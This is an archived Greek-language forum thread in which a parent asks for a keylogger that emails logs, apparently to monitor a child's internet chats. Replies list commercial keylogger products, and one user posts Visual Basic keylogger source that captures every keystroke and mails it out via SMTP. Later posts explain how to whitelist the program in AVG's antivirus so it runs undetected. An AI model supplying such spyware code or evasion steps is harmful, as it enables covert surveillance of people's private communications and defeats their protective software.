Προς το περιεχόμενο

keylogger

nikspyr

Προτεινόμενες αναρτήσεις

Δημοσ.

Καλημέρα σε όλους,

ψάχνω ένα πρόγραμμα keylogger για να εξακριβώσω τις συνομιλιες της κόρης μου στο internet. Όμως θα ήθελα να παίρνω τα Log με email. Ευχαριστώ πολύ

• 1 μήνα μετά...
Δημοσ.

Υπάρχουν κάποια προΪόντα στην αγορά (Hardware).

Και κάποια SoftWare. Αλλά δεν θα σας συνιστούσα να κάνετε κάτι τέττειο... Θα θέλατε κάποιος να ξέρει τι λέτε και τι κάνετε χωρις να το έχετε υπόψη σας ?

Δημοσ.

Σβήστηκαν 5 μηνύματα που προσπαθούν να εκτροχιάσουν το θέμα (ή απαντούν σε τέτοια μηνύματα).

Όποιος θέλει να απαντήσει στον topic starter, απαντά. Όποιος δε θέλει, απέχει. Όποιος πιστεύει ότι κάποια μηνύματα ή και ολόκληρο το θέμα θίγουν κάποιον από τους Όρους Χρήσης του φόρουμ, υποβάλλει σχετική αναφορά και το αφήνει στην κρίση των αρμοδίων. Απλά τα πράγματα.

Δημοσ.

Λοιπόν υπάρχουν πολλοί διαθέσιμοι keyloggers. To θέμα της αποτελεσματικότητας κρίνεται απο την λίστα τoυ ΑV

που προστατεύει το PC..Αν το αντι-ιικό πιάσει τον ''κατάσκοπο'' το σχέδιο θα γίνει αντιληπτό μάλλον.

Διάλεξε και πάρε.

.

Award Keylogger

Beyond Keylogger

007 Spy Software

Ardamax Keylogger

Elite Keylogger

Ghost Keylogger

Handy Keylogger WideStep Software

Invisible Keylogger Stealth

NextSecurity Remote Keylogger

OverSpy

Perfect Keylogger

SpyAgent

XPCSpy Pro

Μια χαρά! Να σαι πιτσιρίκι και αντί στο Kellogs για πρωινό, να σου βάζουνε Κeylogger!
;-)
Δημοσ.

Έφτιαξα ένα code ειδικά για εσάς !:-)

Στο Visual Basic 8 (βάλτε ένα TextBox, 2 Timer) κτλ κτλ

Εάν θέλετε να σας το κάνω εγώ πείτε μου...

>Imports System.Web
Imports System.IO
Imports System.Net.Mail

Public Class Form1
   Dim result As Integer
   Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

End Sub

Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
       For i = 1 To 255
           result = 0
           result = GetAsyncKeyState(i)
           If result = -32767 Then
               TextBox1.Text = TextBox1.Text + Chr(i)
           End If
       Next i

End Sub

Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick
       Dim mail As New MailMessage()
       Dim SmtpServer As New SmtpClient
       SmtpServer.Credentials = New Net.NetworkCredential("[email protected]", "furryman")
       SmtpServer.Port = [color="Magenta"]Το πορταλ[/color]
       SmtpServer.Host = "[color="Magenta"]Το ΣΤΜΠ του ΣΕΡΒΕΡ[/color]"
       SmtpServer.EnableSsl = True
       SmtpServer.EnableSsl = True
       mail.To.Add("[color="Magenta"]TO Ε-μαιλ ΣΑΣ[/color]")
       mail.From = New MailAddress("[email protected]")
       mail.Subject = "Universal Keylogger"
       mail.Body = TextBox1.Text
       SmtpServer.Send(mail)
   End Sub
End Class

Δείτε και αυτό http://www.refog.com/

Δημοσ.
Επειδη τοχω ψαξει.......... το 2ρο που σου προτεινει ο φιλος(beyond) ειναι πολυ καλο

επειδή και η αδερφή μου ψάχνει ένα τέτοιο πρόγραμμα για το γιο της που μπαίνει στο ιντερνετ κι έχει αλλάξει λίγο η συμπεριφορά του, αυτό που προτείνεις ελέγχει για όλη τη μέρα ή μόνο λίγη ώρα;

Δημοσ.

Και κάπου εκέι ο γιος θα βάλει ένα KeyScrambler και η μητέρα θα βλέπει αντί για “Γειά σου τι κάνεις” αυτό ‘%Ghj*(0 6^v’

Πω πω που έχει μπλέξει το παιδί μου, τι παίρνει

Δημοσ.
Λειτουργει συνεχεια αρκει να το κανεις exception απο το antivirus

έχει το avg. Έχει

1. "PUP expections" για "potentially unwanted programs expections" και

2. "resident shield" "expections"

Χρειάζεται και στα 2 να προσθέσει το πρόγραμμα; Υπάρχει και κάπου αλλού αν γνωρίζεις το avg;

Σ'ευχαριστούμε πολύ για τη βοήθεια.

Δημοσ.

Ξερουμε το μηχανισμο ενος key scrambler? Δηλαδη εστω οτι εχω hook στο πληκτρολογιο και διοχετευω την πληροφορια στο Χ αρχειο πριν περασει στο προγραμμα.

ο Σκραμπλερ θα πρεπει να μπει 1) πριν το hook και 2) να περάσει στο σωστό πρόγραμμα τα σωστά δεδομένα.

Δημοσ.
έχει το avg. Έχει

1. "PUP expections" για "potentially unwanted programs expections" και

2. "resident shield" "expections"

Χρειάζεται και στα 2 να προσθέσει το πρόγραμμα; Υπάρχει και κάπου αλλού αν γνωρίζεις το avg;

Σ'ευχαριστούμε πολύ για τη βοήθεια.

Και στα 2 καντο. Στο ενα θελει μονο το αρχειο και στο αλλο ολο το path νομιζω στο AVG

Αρχειοθετημένο

Αυτό το θέμα έχει αρχειοθετηθεί και είναι κλειστό για περαιτέρω απαντήσεις.

• Δημιουργία νέου...